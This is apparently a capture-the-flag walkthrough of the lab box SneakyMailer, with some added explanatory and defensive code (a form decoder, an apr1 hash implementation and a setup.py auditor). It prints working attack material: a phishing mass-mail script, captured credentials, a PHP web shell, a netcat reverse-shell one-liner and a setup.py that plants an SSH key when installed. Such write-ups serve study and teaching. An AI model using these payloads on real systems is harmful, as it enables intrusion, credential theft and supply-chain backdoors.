Hello fellow hackers,
From the nmap scan I have 7 open ports.
# Nmap 7.80 scan initiated Wed Sep 9 05:06:25 2020 as: nmap -sC -sV -oN initial 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.078s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
| 256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_ 256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp open imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES NAMESPACE UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA IDLE ENABLE STARTTLS ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: ACL2=UNION CHILDREN SORT THREAD=REFERENCES AUTH=PLAIN UIDPLUS CAPABILITY OK UTF8=ACCEPTA0001 IMAP4rev1 THREAD=ORDEREDSUBJECT completed QUOTA NAMESPACE ENABLE IDLE ACL
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Not valid before: 2020-05-14T17:14:21
|_Not valid after: 2021-05-14T17:14:21
|_ssl-date: TLS randomness does not represent time
8080/tcp open http nginx 1.14.2
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Sep 9 05:07:08 2020 -- 1 IP address (1 host up) scanned in 43.31 seconds
As always, first I go to port 80. Visiting this website I get a dashboard, but I can't do much with it. I go to team.php and can see the list of all employees of the company. Directory brute force also didn't give me anything. Looking at nmap again, we have SMTP open on port 25.
SMTP, or Simple Mail Transfer Protocol, is the protocol that handles email transfer, so it can be used to send emails. IMAP, on the other hand, is used to receive email. With SMTP open on port 25 we can use telnet and try to send emails to the addresses we previously found at team.php.
kali@kali:~/Desktop/SneakyMailer/nmap$ telnet 10.10.10.197 25
Trying 10.10.10.197...
Connected to 10.10.10.197.
Escape character is '^]'.
220 debian ESMTP Postfix (Debian/GNU)
MAIL FROM: anything@htb.com
250 2.1.0 Ok
RCPT TO: someemail@htb.com
454 4.7.1 <someemail@htb.com>: Relay access denied
RCPT TO:airisatou@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello there friend.
.
250 2.0.0 Ok: queued as 5A0B024689
So we successfully sent an email to one of the email addresses found on team.php. Maybe we can send a link and see if someone behind these addresses clicks it. But first of all we need to get all the email addresses from team.php. You can do that by using cewl.
cewl -n -e --email_file mailid.txt http://sneakycorp.htb
This will output a file mailid.txt with all the email addresses. Then, to automate the whole process of sending an email to each address, I created a Python script. I will also set up a listener on my machine.
#!/usr/bin/python
import smtplib

smtpObj = smtplib.SMTP('10.10.10.197')
sender = 'fuxsocy@htb.com'
message = "Check this out http://10.10.14.188"

# mailid.txt holds one address per line, as written by cewl
with open("../email/mailid.txt") as mails:
    emails = [line.strip() for line in mails.read().split("\n") if line]

for i in emails:
    smtpObj.sendmail(sender, i, message)
    print("Successfully sent email")
A user clicked the link and sent us these parameters. I am going to decode them because they are URL encoded.
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht
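As an added example (not part of the original post), here is the decoding step done with Python's standard library instead of by hand. The form body is copied from the page exactly as shown there; the only remaining percent sequence, "%Kh", is not a valid escape, so the decoder leaves it untouched. The block also shows what the same fields look like on the wire when a browser submits them, and checks that the two password fields agree.

```python
from urllib.parse import parse_qs, urlencode

# Constructed copy of the form body shown above, exactly as it appears on the page.
CAPTURED_BODY = (
    "firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb"
    "&password=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht"
    "&rpassword=^(#J@SkFv2[%KhIxKk(JuhqcHl<:Ht"
)


def decode_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a flat dict.

    parse_qs returns a list per key (a form may repeat a field); we keep the
    first value of each, which is what a typical form handler does.
    """
    return {key: values[0] for key, values in parse_qs(body, keep_blank_values=True).items()}


def encode_form(fields: dict) -> str:
    """Encode a dict the way a browser submits it (reserved characters become %XX)."""
    return urlencode(fields)


def password_fields_match(fields: dict) -> bool:
    """Check that the 'password' field and its confirmation agree."""
    return fields.get("password") == fields.get("rpassword")


if __name__ == "__main__":
    fields = decode_form(CAPTURED_BODY)
    for key, value in fields.items():
        print(f"{key} = {value}")
    print("password fields match:", password_fields_match(fields))
    print("browser wire form:", encode_form(fields))
```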
I now have the password of an email account. I tried to use it on the SSH port but failed, and I also tried it on FTP but failed there too.
But as this is an email address, I can use it on the IMAP server to authenticate. I download Evolution, which is an email client, and then log in as paulbyrd with the password found.
Inside the sent email folder, one email has credentials in it.
Hello administrator, I want to change this password for the developer account
Username: developer
Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
Please notify me when you do it
I then use this password against FTP and successfully log in. I also have permission to upload files to the server inside the /dev/ folder. I create a simple PHP shell script and upload it using the put command.
<?php
echo exec($_GET['fuxsocy']);
?>
But I wasn't able to find the script on the web app on port 80. So maybe it is hidden in another folder, but that wasn't the case. I did a little subdomain discovery using wfuzz and found another subdomain.
This finds another subdomain, called dev. I edit the /etc/hosts file and include that subdomain. Upon visiting that subdomain I try to gain RCE with the file I previously uploaded via FTP.
At this point I try to get a reverse shell back to me by running this command through the file, URL-encoded:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPHERE 8989 >/tmp/f
Looking inside /var/www we have 3 folders: 2 of them belong to different subdomains and 1 is /html. I try to explore pypi.sneakycorp.htb as this is new to me. Inside of it is a .htpasswd file, containing a hash along with a username.
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
Looking at the hashcat example hashes, the hash is mode 1600. I use rockyou.txt and find the password soufianeelhaoui for the pypi server.
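Hashcat mode 1600 is Apache's $apr1$ flavour of MD5-crypt, the format `htpasswd -m` writes. As an added example (not from the original post), the block below implements that algorithm in plain Python so you can see what the salt, the 1000-round loop and the crypt-style base64 digest in the entry above actually are, and verifies a candidate password against an htpasswd line the way a server would. The line itself is copied from the page; the "correct horse" sample is constructed.

```python
import hashlib
import hmac

# The .htpasswd line from the page.
HTPASSWD_ENTRY = "pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/"

# crypt(3)-style base64 alphabet used by md5crypt/apr1.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """Emit `count` characters, least-significant 6 bits first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password: str, salt: str) -> str:
    """Apache's $apr1$ variant of MD5-crypt (what `htpasswd -m` writes; hashcat mode 1600)."""
    pw = password.encode()
    salt_b = salt[:8].encode()  # the salt is at most 8 characters
    ctx = hashlib.md5(pw + b"$apr1$" + salt_b)
    alt = hashlib.md5(pw + salt_b + pw).digest()
    # Mix in the alternate digest, one byte per password byte.
    remaining = len(pw)
    while remaining > 0:
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    # For each bit of the password length, add a NUL or the first password byte.
    bits = len(pw)
    while bits:
        ctx.update(b"\x00" if bits & 1 else pw[:1])
        bits >>= 1
    final = ctx.digest()
    # Fixed 1000-round stretching loop with a data-dependent mixing pattern.
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    f = final
    encoded = (
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4)
        + _to64((f[1] << 16) | (f[7] << 8) | f[13], 4)
        + _to64((f[2] << 16) | (f[8] << 8) | f[14], 4)
        + _to64((f[3] << 16) | (f[9] << 8) | f[15], 4)
        + _to64((f[4] << 16) | (f[10] << 8) | f[5], 4)
        + _to64(f[11], 2)
    )
    return f"$apr1${salt_b.decode()}${encoded}"


def parse_htpasswd_line(line: str):
    """Split 'user:$apr1$salt$digest' into (user, scheme, salt, digest)."""
    user, hashed = line.strip().split(":", 1)
    _, scheme, salt, digest = hashed.split("$")
    return user, scheme, salt, digest


def verify_entry(line: str, candidate: str) -> bool:
    """Return True if `candidate` is the password behind an apr1 htpasswd line."""
    _, scheme, salt, _ = parse_htpasswd_line(line)
    if scheme != "apr1":
        raise ValueError(f"unsupported scheme {scheme!r}")
    stored = line.strip().split(":", 1)[1]
    # Constant-time comparison, as a server-side check should do.
    return hmac.compare_digest(apr1_crypt(candidate, salt), stored)


if __name__ == "__main__":
    print(apr1_crypt("correct horse", "RV5c5YVs"))
    print("page entry matches recovered password:",
          verify_entry(HTPASSWD_ENTRY, "soufianeelhaoui"))
```

Note the cost is fixed at 1000 MD5 rounds, which is why a wordlist attack with hashcat finishes quickly; for anything you administer yourself, bcrypt entries (`htpasswd -B`) are the better choice.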
Pypiserver is a repository of all the Python packages you want to fetch with pip. You can also create your own packages and store them there. We have the username and the password, so we can use these to upload our own packages to the server. Reading this post from Linode I get an understanding of what I should do in order to upload my own package to the server. Let's break it down one by one and create one:
Our directory structure should look like this, where package_htb is our package name.
package_htb/
    package_htb/
        __init__.py
    setup.py
    setup.cfg
I create these inside /dev/shm/ (you can also use /tmp/ or any directory you have write access to).
__init__.py :
def hello_world():
    print("hello world")
Inside this file we can execute our own code as long as the package gets to the server. While enumerating I found a user, low, whose authorized_keys I can read but not write, so I will create an SSH key pair on my local machine and then write the public key for the user low on the machine.
ssh-keygen -t ed25519
I am using ed25519 because the output of the public key is short and I won't mess up the Python code with newlines etc.
setup.py :
from setuptools import setup

# setup.py runs whenever the package is built or installed. The write only
# succeeds where the path exists and is writable; on the attacking machine
# it fails, and the error is ignored so that sdist/upload still run.
try:
    with open("/home/low/.ssh/authorized_keys", 'w') as f:
        f.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEBu9PghaYMY4ap+f/M7Z2LnkRyaYEIH7EphN6xV2Zug kali@kali")
except OSError:
    pass

setup(
    name = 'package_htb',
    packages = ['package_htb'],
    description = 'Hello world enterprise edition',
    version = '0.1',
    url = 'http://pypi.sneakycorp.htb/package_htb',
    author = 'package_htb',
    author_email = 'fuxsocy@sneaky.com',
    keywords = ['pip', 'gis', 'example']
)
setup.cfg:
[metadata]
description-file = README.md
To upload this package to the server we need to create another file containing the password we found.
.pypirc:
[distutils]
index-servers =
    pypi
    package_htb

[pypi]
username:
password:

[package_htb]
repository: http://127.0.0.1:5000
username: pypi
password: soufianeelhaoui
The server port was found using netstat, and then I used wget to verify it was that port.
Now we need to build the source distribution of the package:
python3 setup.py sdist
Set the home directory to the current path, so that distutils finds the .pypirc file there:
export HOME=/dev/shm/package_htb
Upload the package to the server:
python3 setup.py sdist upload -r package_htb
Now our SSH public key was written to the low user's profile, so we can access the low user over SSH.
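The whole package step works only because setup.py is ordinary Python that is executed at build and install time, so anything placed around the setup() call runs with the privileges of whoever installs the package. As an added example (not part of the original post), here is a small audit script a maintainer could run over a package's setup.py before installing anything from an internal index: it parses the file with the ast module and reports imports, calls and string constants that point to install-time side effects, plus any top-level statement that is not plain metadata. The two sample sources are constructed here; the suspicious one is the walkthrough's setup.py with the key replaced by a placeholder.

```python
import ast

# Constructed sample: the setup.py used in the walkthrough above, with the
# public key replaced by a placeholder. It writes a file before calling setup().
SUSPICIOUS_SETUP_PY = '''\
from setuptools import setup
try:
    with open("/home/low/.ssh/authorized_keys", "w") as f:
        f.write("ssh-ed25519 AAAA...PLACEHOLDER kali@kali")
except OSError:
    pass
setup(name="package_htb", packages=["package_htb"], version="0.1")
'''

# Constructed sample of a setup.py that only declares metadata.
BENIGN_SETUP_PY = '''\
from setuptools import setup
setup(name="package_htb", packages=["package_htb"], version="0.1")
'''

RISKY_MODULES = {"os", "subprocess", "socket", "shutil", "ctypes", "urllib", "requests"}
RISKY_CALLS = {"open", "system", "popen", "run", "call", "check_call",
               "check_output", "Popen", "exec", "eval", "urlopen"}
SENSITIVE_PATH_HINTS = ("/.ssh/", "/etc/", "/root/", "/home/")


def _call_name(call: ast.Call):
    """Return the bare name of the called function, e.g. open, or subprocess.run -> run."""
    func = call.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return None


def audit_setup_py(source: str):
    """Return sorted (line, description) findings for install-time side effects."""
    tree = ast.parse(source)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                findings.append((node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in RISKY_CALLS:
                findings.append((node.lineno, f"calls {name}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(hint in node.value for hint in SENSITIVE_PATH_HINTS):
                findings.append((node.lineno, f"references path {node.value!r}"))
    # Anything at module level other than imports, assignments and the setup()
    # call itself is code that runs whenever the package is built or installed.
    for stmt in tree.body:
        if isinstance(stmt, (ast.Import, ast.ImportFrom, ast.Assign)):
            continue
        if (isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call)
                and _call_name(stmt.value) == "setup"):
            continue
        findings.append((stmt.lineno, f"top-level {type(stmt).__name__} runs at install time"))
    return sorted(findings)


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(f"== {label} ==")
        for line, desc in audit_setup_py(src) or [("-", "no findings")]:
            print(f"  line {line}: {desc}")
```

Static checks like this catch the obvious case but not obfuscated payloads, so the stronger mitigations are the ones the box lacks: not installing whatever lands on the index automatically, and not running the installer as a user whose SSH configuration is writable.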
User low can run pip3 as sudo without a password.
Visiting GTFOBins, we can use that to gain root access on the system.
We can find some scripts inside the /opt directory which automate the email click and the FTP file deletion. Looking at those scripts we can learn more about PHP and Python 3.